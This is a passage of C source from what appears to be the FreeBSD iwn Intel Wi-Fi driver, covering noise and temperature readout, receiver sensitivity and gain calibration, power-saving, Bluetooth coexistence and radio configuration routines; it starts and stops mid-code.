"%s: agc %d rssi %d %d %d result %d\n", __func__, agc, phy->rssi[0], phy->rssi[1], phy->rssi[2], rssi - agc - IWN_RSSI_TO_DBM); return rssi - agc - IWN_RSSI_TO_DBM; } /* * Retrieve the average noise (in dBm) among receivers. */ static int iwn_get_noise(const struct iwn_rx_general_stats *stats) { int i, total, nbant, noise; total = nbant = 0; for (i = 0; i < 3; i++) { if ((noise = le32toh(stats->noise[i]) & 0xff) == 0) continue; total += noise; nbant++; } /* There should be at least one antenna but check anyway. */ return (nbant == 0) ? -127 : (total / nbant) - 107; } /* * Compute temperature (in degC) from last received statistics. */ static int iwn4965_get_temperature(struct iwn_softc *sc) { struct iwn_ucode_info *uc = &sc->ucode_info; int32_t r1, r2, r3, r4, temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); r1 = le32toh(uc->temp[0].chan20MHz); r2 = le32toh(uc->temp[1].chan20MHz); r3 = le32toh(uc->temp[2].chan20MHz); r4 = le32toh(sc->rawtemp); if (r1 == r3) /* Prevents division by 0 (should not happen). */ return 0; /* Sign-extend 23-bit R4 value to 32-bit. */ r4 = ((r4 & 0xffffff) ^ 0x800000) - 0x800000; /* Compute temperature in Kelvin. */ temp = (259 * (r4 - r2)) / (r3 - r1); temp = (temp * 97) / 100 + 8; DPRINTF(sc, IWN_DEBUG_ANY, "temperature %dK/%dC\n", temp, IWN_KTOC(temp)); return IWN_KTOC(temp); } static int iwn5000_get_temperature(struct iwn_softc *sc) { int32_t temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* * Temperature is not used by the driver for 5000 Series because * TX power calibration is handled by firmware. */ temp = le32toh(sc->rawtemp); if (sc->hw_type == IWN_HW_REV_TYPE_5150) { temp = (temp / -5) + sc->temp_off; temp = IWN_KTOC(temp); } return temp; } /* * Initialize sensitivity calibration state machine. */ static int iwn_init_sensitivity(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct iwn_calib_state *calib = &sc->calib; uint32_t flags; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Reset calibration state machine. */ memset(calib, 0, sizeof (*calib)); calib->state = IWN_CALIB_STATE_INIT; calib->cck_state = IWN_CCK_STATE_HIFA; /* Set initial correlation values. 
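 * The OFDM thresholds start from the per-chip minima in sc->limits,
 * while cck_x4 starts from a fixed mid-range value (125); all of them
 * are then moved up or down at run time by iwn_tune_sensitivity()
 * based on the false-alarm counters.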
*/ calib->ofdm_x1 = sc->limits->min_ofdm_x1; calib->ofdm_mrc_x1 = sc->limits->min_ofdm_mrc_x1; calib->ofdm_x4 = sc->limits->min_ofdm_x4; calib->ofdm_mrc_x4 = sc->limits->min_ofdm_mrc_x4; calib->cck_x4 = 125; calib->cck_mrc_x4 = sc->limits->min_cck_mrc_x4; calib->energy_cck = sc->limits->energy_cck; /* Write initial sensitivity. */ if ((error = iwn_send_sensitivity(sc)) != 0) return error; /* Write initial gains. */ if ((error = ops->init_gains(sc)) != 0) return error; /* Request statistics at each beacon interval. */ flags = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: sending request for statistics\n", __func__); return iwn_cmd(sc, IWN_CMD_GET_STATISTICS, &flags, sizeof flags, 1); } /* * Collect noise and RSSI statistics for the first 20 beacons received * after association and use them to determine connected antennas and * to set differential gains. */ static void iwn_collect_noise(struct iwn_softc *sc, const struct iwn_rx_general_stats *stats) { struct iwn_ops *ops = &sc->ops; struct iwn_calib_state *calib = &sc->calib; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t val; int i; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Accumulate RSSI and noise for all 3 antennas. */ for (i = 0; i < 3; i++) { calib->rssi[i] += le32toh(stats->rssi[i]) & 0xff; calib->noise[i] += le32toh(stats->noise[i]) & 0xff; } /* NB: We update differential gains only once after 20 beacons. */ if (++calib->nbeacons < 20) return; /* Determine highest average RSSI. */ val = MAX(calib->rssi[0], calib->rssi[1]); val = MAX(calib->rssi[2], val); /* Determine which antennas are connected. */ sc->chainmask = sc->rxchainmask; for (i = 0; i < 3; i++) if (val - calib->rssi[i] > 15 * 20) sc->chainmask &= ~(1 << i); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: RX chains mask: theoretical=0x%x, actual=0x%x\n", __func__, sc->rxchainmask, sc->chainmask); /* If none of the TX antennas are connected, keep at least one. */ if ((sc->chainmask & sc->txchainmask) == 0) sc->chainmask |= IWN_LSB(sc->txchainmask); (void)ops->set_gains(sc); calib->state = IWN_CALIB_STATE_RUN; #ifdef notyet /* XXX Disable RX chains with no antennas connected. */ sc->rxon->rxchain = htole16(IWN_RXCHAIN_SEL(sc->chainmask)); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); (void)iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 1); #endif /* Enable power-saving mode if requested by user. */ if (ic->ic_flags & IEEE80211_F_PMGTON) (void)iwn_set_pslevel(sc, 0, 3, 1); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } static int iwn4965_init_gains(struct iwn_softc *sc) { struct iwn_phy_calib_gain cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.code = IWN4965_PHY_CALIB_DIFF_GAIN; /* Differential gains initially set to 0 for all 3 antennas. 
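 * Sending the zeroed command is sufficient at this point; per-antenna
 * deltas are computed later by iwn4965_set_gains() (or the 5000-series
 * equivalent) once iwn_collect_noise() has accumulated statistics for
 * 20 beacons.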
*/ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting initial differential gains\n", __func__); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn5000_init_gains(struct iwn_softc *sc) { struct iwn_phy_calib cmd; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); memset(&cmd, 0, sizeof cmd); cmd.code = sc->reset_noise_gain; cmd.ngroups = 1; cmd.isvalid = 1; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: setting initial differential gains\n", __func__); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn4965_set_gains(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_phy_calib_gain cmd; int i, delta, noise; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Get minimal noise among connected antennas. */ noise = INT_MAX; /* NB: There's at least one antenna. */ for (i = 0; i < 3; i++) if (sc->chainmask & (1 << i)) noise = MIN(calib->noise[i], noise); memset(&cmd, 0, sizeof cmd); cmd.code = IWN4965_PHY_CALIB_DIFF_GAIN; /* Set differential gains for connected antennas. */ for (i = 0; i < 3; i++) { if (sc->chainmask & (1 << i)) { /* Compute attenuation (in unit of 1.5dB). */ delta = (noise - (int32_t)calib->noise[i]) / 30; /* NB: delta <= 0 */ /* Limit to [-4.5dB,0]. */ cmd.gain[i] = MIN(abs(delta), 3); if (delta < 0) cmd.gain[i] |= 1 << 2; /* sign bit */ } } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting differential gains Ant A/B/C: %x/%x/%x (%x)\n", cmd.gain[0], cmd.gain[1], cmd.gain[2], sc->chainmask); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } static int iwn5000_set_gains(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_phy_calib_gain cmd; int i, ant, div, delta; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* We collected 20 beacons and !=6050 need a 1.5 factor. */ div = (sc->hw_type == IWN_HW_REV_TYPE_6050) ? 20 : 30; memset(&cmd, 0, sizeof cmd); cmd.code = sc->noise_gain; cmd.ngroups = 1; cmd.isvalid = 1; /* Get first available RX antenna as referential. */ ant = IWN_LSB(sc->rxchainmask); /* Set differential gains for other antennas. */ for (i = ant + 1; i < 3; i++) { if (sc->chainmask & (1 << i)) { /* The delta is relative to antenna "ant". */ delta = ((int32_t)calib->noise[ant] - (int32_t)calib->noise[i]) / div; /* Limit to [-4.5dB,+4.5dB]. */ cmd.gain[i - 1] = MIN(abs(delta), 3); if (delta < 0) cmd.gain[i - 1] |= 1 << 2; /* sign bit */ } } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting differential gains Ant B/C: %x/%x (%x)\n", cmd.gain[0], cmd.gain[1], sc->chainmask); return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 1); } /* * Tune RF RX sensitivity based on the number of false alarms detected * during the last beacon period. */ static void iwn_tune_sensitivity(struct iwn_softc *sc, const struct iwn_rx_stats *stats) { #define inc(val, inc, max) \ if ((val) < (max)) { \ if ((val) < (max) - (inc)) \ (val) += (inc); \ else \ (val) = (max); \ needs_update = 1; \ } #define dec(val, dec, min) \ if ((val) > (min)) { \ if ((val) > (min) + (dec)) \ (val) -= (dec); \ else \ (val) = (min); \ needs_update = 1; \ } const struct iwn_sensitivity_limits *limits = sc->limits; struct iwn_calib_state *calib = &sc->calib; uint32_t val, rxena, fa; uint32_t energy[3], energy_min; uint8_t noise[3], noise_ref; int i, needs_update = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Check that we've been enabled long enough. 
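 * The scaling applied below makes the two quantities comparable
 * (assuming, as in the Linux driver, that the "load" statistic counts
 * receiver-enabled time in microseconds): the false-alarm count is
 * multiplied by 200 TU (200 * 1024 usec) before being compared with the
 * enabled time, so "fa > 50 * rxena" roughly means "more than 50 false
 * alarms per 200 TU of listen time" and "fa < 5 * rxena" means fewer
 * than 5, at which point the correlation thresholds are nudged up or
 * down within the per-chip limits.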
*/ if ((rxena = le32toh(stats->general.load)) == 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end not so long\n", __func__); return; } /* Compute number of false alarms since last call for OFDM. */ fa = le32toh(stats->ofdm.bad_plcp) - calib->bad_plcp_ofdm; fa += le32toh(stats->ofdm.fa) - calib->fa_ofdm; fa *= 200 * IEEE80211_DUR_TU; /* 200TU */ if (fa > 50 * rxena) { /* High false alarm count, decrease sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: OFDM high false alarm count: %u\n", __func__, fa); inc(calib->ofdm_x1, 1, limits->max_ofdm_x1); inc(calib->ofdm_mrc_x1, 1, limits->max_ofdm_mrc_x1); inc(calib->ofdm_x4, 1, limits->max_ofdm_x4); inc(calib->ofdm_mrc_x4, 1, limits->max_ofdm_mrc_x4); } else if (fa < 5 * rxena) { /* Low false alarm count, increase sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: OFDM low false alarm count: %u\n", __func__, fa); dec(calib->ofdm_x1, 1, limits->min_ofdm_x1); dec(calib->ofdm_mrc_x1, 1, limits->min_ofdm_mrc_x1); dec(calib->ofdm_x4, 1, limits->min_ofdm_x4); dec(calib->ofdm_mrc_x4, 1, limits->min_ofdm_mrc_x4); } /* Compute maximum noise among 3 receivers. */ for (i = 0; i < 3; i++) noise[i] = (le32toh(stats->general.noise[i]) >> 8) & 0xff; val = MAX(noise[0], noise[1]); val = MAX(noise[2], val); /* Insert it into our samples table. */ calib->noise_samples[calib->cur_noise_sample] = val; calib->cur_noise_sample = (calib->cur_noise_sample + 1) % 20; /* Compute maximum noise among last 20 samples. */ noise_ref = calib->noise_samples[0]; for (i = 1; i < 20; i++) noise_ref = MAX(noise_ref, calib->noise_samples[i]); /* Compute maximum energy among 3 receivers. */ for (i = 0; i < 3; i++) energy[i] = le32toh(stats->general.energy[i]); val = MIN(energy[0], energy[1]); val = MIN(energy[2], val); /* Insert it into our samples table. */ calib->energy_samples[calib->cur_energy_sample] = val; calib->cur_energy_sample = (calib->cur_energy_sample + 1) % 10; /* Compute minimum energy among last 10 samples. */ energy_min = calib->energy_samples[0]; for (i = 1; i < 10; i++) energy_min = MAX(energy_min, calib->energy_samples[i]); energy_min += 6; /* Compute number of false alarms since last call for CCK. */ fa = le32toh(stats->cck.bad_plcp) - calib->bad_plcp_cck; fa += le32toh(stats->cck.fa) - calib->fa_cck; fa *= 200 * IEEE80211_DUR_TU; /* 200TU */ if (fa > 50 * rxena) { /* High false alarm count, decrease sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK high false alarm count: %u\n", __func__, fa); calib->cck_state = IWN_CCK_STATE_HIFA; calib->low_fa = 0; if (calib->cck_x4 > 160) { calib->noise_ref = noise_ref; if (calib->energy_cck > 2) dec(calib->energy_cck, 2, energy_min); } if (calib->cck_x4 < 160) { calib->cck_x4 = 161; needs_update = 1; } else inc(calib->cck_x4, 3, limits->max_cck_x4); inc(calib->cck_mrc_x4, 3, limits->max_cck_mrc_x4); } else if (fa < 5 * rxena) { /* Low false alarm count, increase sensitivity. */ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK low false alarm count: %u\n", __func__, fa); calib->cck_state = IWN_CCK_STATE_LOFA; calib->low_fa++; if (calib->cck_state != IWN_CCK_STATE_INIT && (((int32_t)calib->noise_ref - (int32_t)noise_ref) > 2 || calib->low_fa > 100)) { inc(calib->energy_cck, 2, limits->min_energy_cck); dec(calib->cck_x4, 3, limits->min_cck_x4); dec(calib->cck_mrc_x4, 3, limits->min_cck_mrc_x4); } } else { /* Not worth to increase or decrease sensitivity. 
*/ DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: CCK normal false alarm count: %u\n", __func__, fa); calib->low_fa = 0; calib->noise_ref = noise_ref; if (calib->cck_state == IWN_CCK_STATE_HIFA) { /* Previous interval had many false alarms. */ dec(calib->energy_cck, 8, energy_min); } calib->cck_state = IWN_CCK_STATE_INIT; } if (needs_update) (void)iwn_send_sensitivity(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); #undef dec #undef inc } static int iwn_send_sensitivity(struct iwn_softc *sc) { struct iwn_calib_state *calib = &sc->calib; struct iwn_enhanced_sensitivity_cmd cmd; int len; memset(&cmd, 0, sizeof cmd); len = sizeof (struct iwn_sensitivity_cmd); cmd.which = IWN_SENSITIVITY_WORKTBL; /* OFDM modulation. */ cmd.corr_ofdm_x1 = htole16(calib->ofdm_x1); cmd.corr_ofdm_mrc_x1 = htole16(calib->ofdm_mrc_x1); cmd.corr_ofdm_x4 = htole16(calib->ofdm_x4); cmd.corr_ofdm_mrc_x4 = htole16(calib->ofdm_mrc_x4); cmd.energy_ofdm = htole16(sc->limits->energy_ofdm); cmd.energy_ofdm_th = htole16(62); /* CCK modulation. */ cmd.corr_cck_x4 = htole16(calib->cck_x4); cmd.corr_cck_mrc_x4 = htole16(calib->cck_mrc_x4); cmd.energy_cck = htole16(calib->energy_cck); /* Barker modulation: use default values. */ cmd.corr_barker = htole16(190); cmd.corr_barker_mrc = htole16(sc->limits->barker_mrc); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: set sensitivity %d/%d/%d/%d/%d/%d/%d\n", __func__, calib->ofdm_x1, calib->ofdm_mrc_x1, calib->ofdm_x4, calib->ofdm_mrc_x4, calib->cck_x4, calib->cck_mrc_x4, calib->energy_cck); if (!(sc->sc_flags & IWN_FLAG_ENH_SENS)) goto send; /* Enhanced sensitivity settings. */ len = sizeof (struct iwn_enhanced_sensitivity_cmd); cmd.ofdm_det_slope_mrc = htole16(668); cmd.ofdm_det_icept_mrc = htole16(4); cmd.ofdm_det_slope = htole16(486); cmd.ofdm_det_icept = htole16(37); cmd.cck_det_slope_mrc = htole16(853); cmd.cck_det_icept_mrc = htole16(4); cmd.cck_det_slope = htole16(476); cmd.cck_det_icept = htole16(99); send: return iwn_cmd(sc, IWN_CMD_SET_SENSITIVITY, &cmd, len, 1); } /* * Look at the increase of PLCP errors over time; if it exceeds * a programmed threshold then trigger an RF retune. */ static void iwn_check_rx_recovery(struct iwn_softc *sc, struct iwn_stats *rs) { int32_t delta_ofdm, delta_ht, delta_cck; struct iwn_calib_state *calib = &sc->calib; int delta_ticks, cur_ticks; int delta_msec; int thresh; /* * Calculate the difference between the current and * previous statistics. */ delta_cck = le32toh(rs->rx.cck.bad_plcp) - calib->bad_plcp_cck; delta_ofdm = le32toh(rs->rx.ofdm.bad_plcp) - calib->bad_plcp_ofdm; delta_ht = le32toh(rs->rx.ht.bad_plcp) - calib->bad_plcp_ht; /* * Calculate the delta in time between successive statistics * messages. Yes, it can roll over; so we make sure that * this doesn't happen. * * XXX go figure out what to do about rollover * XXX go figure out what to do if ticks rolls over to -ve instead! * XXX go stab signed integer overflow undefined-ness in the face. */ cur_ticks = ticks; delta_ticks = cur_ticks - sc->last_calib_ticks; /* * If any are negative, then the firmware likely reset; so just * bail. We'll pick this up next time. */ if (delta_cck < 0 || delta_ofdm < 0 || delta_ht < 0 || delta_ticks < 0) return; /* * delta_ticks is in ticks; we need to convert it up to milliseconds * so we can do some useful math with it. */ delta_msec = ticks_to_msecs(delta_ticks); /* * Calculate what our threshold is given the current delta_msec. 
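 * Worked example with made-up numbers: if the per-chip
 * plcp_err_threshold is 50 and 1000 msec elapsed since the previous
 * statistics message, then thresh = 50 * 1000 = 50000.  A combined
 * cck+ofdm+ht delta of 600 bad PLCPs gives 600 * 100 = 60000 > 50000,
 * which would flag a retune; this mirrors the Linux
 * "(delta * 100 / msecs) > threshold" check quoted further down.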
*/ thresh = sc->base_params->plcp_err_threshold * delta_msec; DPRINTF(sc, IWN_DEBUG_STATE, "%s: time delta: %d; cck=%d, ofdm=%d, ht=%d, total=%d, thresh=%d\n", __func__, delta_msec, delta_cck, delta_ofdm, delta_ht, (delta_msec + delta_cck + delta_ofdm + delta_ht), thresh); /* * If we need a retune, then schedule a single channel scan * to a channel that isn't the currently active one! * * The math from linux iwlwifi: * * if ((delta * 100 / msecs) > threshold) */ if (thresh > 0 && (delta_cck + delta_ofdm + delta_ht) * 100 > thresh) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: PLCP error threshold raw (%d) comparison (%d) " "over limit (%d); retune!\n", __func__, (delta_cck + delta_ofdm + delta_ht), (delta_cck + delta_ofdm + delta_ht) * 100, thresh); } } /* * Set STA mode power saving level (between 0 and 5). * Level 0 is CAM (Continuously Aware Mode), 5 is for maximum power saving. */ static int iwn_set_pslevel(struct iwn_softc *sc, int dtim, int level, int async) { struct iwn_pmgt_cmd cmd; const struct iwn_pmgt *pmgt; uint32_t max, skip_dtim; uint32_t reg; int i; DPRINTF(sc, IWN_DEBUG_PWRSAVE, "%s: dtim=%d, level=%d, async=%d\n", __func__, dtim, level, async); /* Select which PS parameters to use. */ if (dtim <= 2) pmgt = &iwn_pmgt[0][level]; else if (dtim <= 10) pmgt = &iwn_pmgt[1][level]; else pmgt = &iwn_pmgt[2][level]; memset(&cmd, 0, sizeof cmd); if (level != 0) /* not CAM */ cmd.flags |= htole16(IWN_PS_ALLOW_SLEEP); if (level == 5) cmd.flags |= htole16(IWN_PS_FAST_PD); /* Retrieve PCIe Active State Power Management (ASPM). */ reg = pci_read_config(sc->sc_dev, sc->sc_cap_off + 0x10, 1); if (!(reg & 0x1)) /* L0s Entry disabled. */ cmd.flags |= htole16(IWN_PS_PCI_PMGT); cmd.rxtimeout = htole32(pmgt->rxtimeout * 1024); cmd.txtimeout = htole32(pmgt->txtimeout * 1024); if (dtim == 0) { dtim = 1; skip_dtim = 0; } else skip_dtim = pmgt->skip_dtim; if (skip_dtim != 0) { cmd.flags |= htole16(IWN_PS_SLEEP_OVER_DTIM); max = pmgt->intval[4]; if (max == (uint32_t)-1) max = dtim * (skip_dtim + 1); else if (max > dtim) max = (max / dtim) * dtim; } else max = dtim; for (i = 0; i < 5; i++) cmd.intval[i] = htole32(MIN(max, pmgt->intval[i])); DPRINTF(sc, IWN_DEBUG_RESET, "setting power saving level to %d\n", level); return iwn_cmd(sc, IWN_CMD_SET_POWER_MODE, &cmd, sizeof cmd, async); } static int iwn_send_btcoex(struct iwn_softc *sc) { struct iwn_bluetooth cmd; memset(&cmd, 0, sizeof cmd); cmd.flags = IWN_BT_COEX_CHAN_ANN | IWN_BT_COEX_BT_PRIO; cmd.lead_time = IWN_BT_LEAD_TIME_DEF; cmd.max_kill = IWN_BT_MAX_KILL_DEF; DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring bluetooth coexistence\n", __func__); return iwn_cmd(sc, IWN_CMD_BT_COEX, &cmd, sizeof(cmd), 0); } static int iwn_send_advanced_btcoex(struct iwn_softc *sc) { static const uint32_t btcoex_3wire[12] = { 0xaaaaaaaa, 0xaaaaaaaa, 0xaeaaaaaa, 0xaaaaaaaa, 0xcc00ff28, 0x0000aaaa, 0xcc00aaaa, 0x0000aaaa, 0xc0004000, 0x00004000, 0xf0005000, 0xf0005000, }; struct iwn6000_btcoex_config btconfig; struct iwn2000_btcoex_config btconfig2k; struct iwn_btcoex_priotable btprio; struct iwn_btcoex_prot btprot; int error, i; uint8_t flags; memset(&btconfig, 0, sizeof btconfig); memset(&btconfig2k, 0, sizeof btconfig2k); flags = IWN_BT_FLAG_COEX6000_MODE_3W << IWN_BT_FLAG_COEX6000_MODE_SHIFT; // Done as is in linux kernel 3.2 if (sc->base_params->bt_sco_disable) flags &= ~IWN_BT_FLAG_SYNC_2_BT_DISABLE; else flags |= IWN_BT_FLAG_SYNC_2_BT_DISABLE; flags |= IWN_BT_FLAG_COEX6000_CHAN_INHIBITION; /* Default flags result is 145 as old value */ /* * Flags value has to be review. 
Values must change if we * which to disable it */ if (sc->base_params->bt_session_2) { btconfig2k.flags = flags; btconfig2k.max_kill = 5; btconfig2k.bt3_t7_timer = 1; btconfig2k.kill_ack = htole32(0xffff0000); btconfig2k.kill_cts = htole32(0xffff0000); btconfig2k.sample_time = 2; btconfig2k.bt3_t2_timer = 0xc; for (i = 0; i < 12; i++) btconfig2k.lookup_table[i] = htole32(btcoex_3wire[i]); btconfig2k.valid = htole16(0xff); btconfig2k.prio_boost = htole32(0xf0); DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring advanced bluetooth coexistence" " session 2, flags : 0x%x\n", __func__, flags); error = iwn_cmd(sc, IWN_CMD_BT_COEX, &btconfig2k, sizeof(btconfig2k), 1); } else { btconfig.flags = flags; btconfig.max_kill = 5; btconfig.bt3_t7_timer = 1; btconfig.kill_ack = htole32(0xffff0000); btconfig.kill_cts = htole32(0xffff0000); btconfig.sample_time = 2; btconfig.bt3_t2_timer = 0xc; for (i = 0; i < 12; i++) btconfig.lookup_table[i] = htole32(btcoex_3wire[i]); btconfig.valid = htole16(0xff); btconfig.prio_boost = 0xf0; DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring advanced bluetooth coexistence," " flags : 0x%x\n", __func__, flags); error = iwn_cmd(sc, IWN_CMD_BT_COEX, &btconfig, sizeof(btconfig), 1); } if (error != 0) return error; memset(&btprio, 0, sizeof btprio); btprio.calib_init1 = 0x6; btprio.calib_init2 = 0x7; btprio.calib_periodic_low1 = 0x2; btprio.calib_periodic_low2 = 0x3; btprio.calib_periodic_high1 = 0x4; btprio.calib_periodic_high2 = 0x5; btprio.dtim = 0x6; btprio.scan52 = 0x8; btprio.scan24 = 0xa; error = iwn_cmd(sc, IWN_CMD_BT_COEX_PRIOTABLE, &btprio, sizeof(btprio), 1); if (error != 0) return error; /* Force BT state machine change. */ memset(&btprot, 0, sizeof btprot); btprot.open = 1; btprot.type = 1; error = iwn_cmd(sc, IWN_CMD_BT_COEX_PROT, &btprot, sizeof(btprot), 1); if (error != 0) return error; btprot.open = 0; return iwn_cmd(sc, IWN_CMD_BT_COEX_PROT, &btprot, sizeof(btprot), 1); } static int iwn5000_runtime_calib(struct iwn_softc *sc) { struct iwn5000_calib_config cmd; memset(&cmd, 0, sizeof cmd); cmd.ucode.once.enable = 0xffffffff; cmd.ucode.once.start = IWN5000_CALIB_DC; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: configuring runtime calibration\n", __func__); return iwn_cmd(sc, IWN5000_CMD_CALIB_CONFIG, &cmd, sizeof(cmd), 0); } static int iwn_config(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t txmask; uint16_t rxchain; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if ((sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET) && (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2)) { device_printf(sc->sc_dev,"%s: temp_offset and temp_offsetv2 are" " exclusive each together. Review NIC config file. Conf" " : 0x%08x Flags : 0x%08x \n", __func__, sc->base_params->calib_need, (IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET | IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2)); return (EINVAL); } /* Compute temperature calib if needed. 
Will be send by send calib */ if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSET) { error = iwn5000_temp_offset_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not set temperature offset\n", __func__); return (error); } } else if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TEMP_OFFSETv2) { error = iwn5000_temp_offset_calibv2(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not compute temperature offset v2\n", __func__); return (error); } } if (sc->hw_type == IWN_HW_REV_TYPE_6050) { /* Configure runtime DC calibration. */ error = iwn5000_runtime_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure runtime calibration\n", __func__); return error; } } /* Configure valid TX chains for >=5000 Series. */ if (sc->hw_type != IWN_HW_REV_TYPE_4965) { txmask = htole32(sc->txchainmask); DPRINTF(sc, IWN_DEBUG_RESET, "%s: configuring valid TX chains 0x%x\n", __func__, txmask); error = iwn_cmd(sc, IWN5000_CMD_TX_ANT_CONFIG, &txmask, sizeof txmask, 0); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure valid TX chains, " "error %d\n", __func__, error); return error; } } /* Configure bluetooth coexistence. */ error = 0; /* Configure bluetooth coexistence if needed. */ if (sc->base_params->bt_mode == IWN_BT_ADVANCED) error = iwn_send_advanced_btcoex(sc); if (sc->base_params->bt_mode == IWN_BT_SIMPLE) error = iwn_send_btcoex(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure bluetooth coexistence, error %d\n", __func__, error); return error; } /* Set mode, channel, RX filter and enable RX. */ sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; memset(sc->rxon, 0, sizeof (struct iwn_rxon)); IEEE80211_ADDR_COPY(sc->rxon->myaddr, IF_LLADDR(ifp)); IEEE80211_ADDR_COPY(sc->rxon->wlap, IF_LLADDR(ifp)); sc->rxon->chan = ieee80211_chan2ieee(ic, ic->ic_curchan); sc->rxon->flags = htole32(IWN_RXON_TSF | IWN_RXON_CTS_TO_SELF); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) sc->rxon->flags |= htole32(IWN_RXON_AUTO | IWN_RXON_24GHZ); switch (ic->ic_opmode) { case IEEE80211_M_STA: sc->rxon->mode = IWN_MODE_STA; sc->rxon->filter = htole32(IWN_FILTER_MULTICAST); break; case IEEE80211_M_MONITOR: sc->rxon->mode = IWN_MODE_MONITOR; sc->rxon->filter = htole32(IWN_FILTER_MULTICAST | IWN_FILTER_CTL | IWN_FILTER_PROMISC); break; default: /* Should not get there. */ break; } sc->rxon->cck_mask = 0x0f; /* not yet negotiated */ sc->rxon->ofdm_mask = 0xff; /* not yet negotiated */ sc->rxon->ht_single_mask = 0xff; sc->rxon->ht_dual_mask = 0xff; sc->rxon->ht_triple_mask = 0xff; rxchain = IWN_RXCHAIN_VALID(sc->rxchainmask) | IWN_RXCHAIN_MIMO_COUNT(2) | IWN_RXCHAIN_IDLE_COUNT(2); sc->rxon->rxchain = htole16(rxchain); DPRINTF(sc, IWN_DEBUG_RESET, "%s: setting configuration\n", __func__); if (sc->sc_is_scanning) device_printf(sc->sc_dev, "%s: is_scanning set, before RXON\n", __func__); error = iwn_cmd(sc, IWN_CMD_RXON, sc->rxon, sc->rxonsz, 0); if (error != 0) { device_printf(sc->sc_dev, "%s: RXON command failed\n", __func__); return error; } if ((error = iwn_add_broadcast_node(sc, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not add broadcast node\n", __func__); return error; } /* Configuration has changed, set TX power accordingly. 
*/ if ((error = ops->set_txpower(sc, ic->ic_curchan, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not set TX power\n", __func__); return error; } if ((error = iwn_set_critical_temp(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not set critical temperature\n", __func__); return error; } /* Set power saving level to CAM during initialization. */ if ((error = iwn_set_pslevel(sc, 0, 0, 0)) != 0) { device_printf(sc->sc_dev, "%s: could not set power saving level\n", __func__); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return 0; } /* * Add an ssid element to a frame. */ static uint8_t * ieee80211_add_ssid(uint8_t *frm, const uint8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } static uint16_t iwn_get_active_dwell_time(struct iwn_softc *sc, struct ieee80211_channel *c, uint8_t n_probes) { /* No channel? Default to 2GHz settings */ if (c == NULL || IEEE80211_IS_CHAN_2GHZ(c)) { return (IWN_ACTIVE_DWELL_TIME_2GHZ + IWN_ACTIVE_DWELL_FACTOR_2GHZ * (n_probes + 1)); } /* 5GHz dwell time */ return 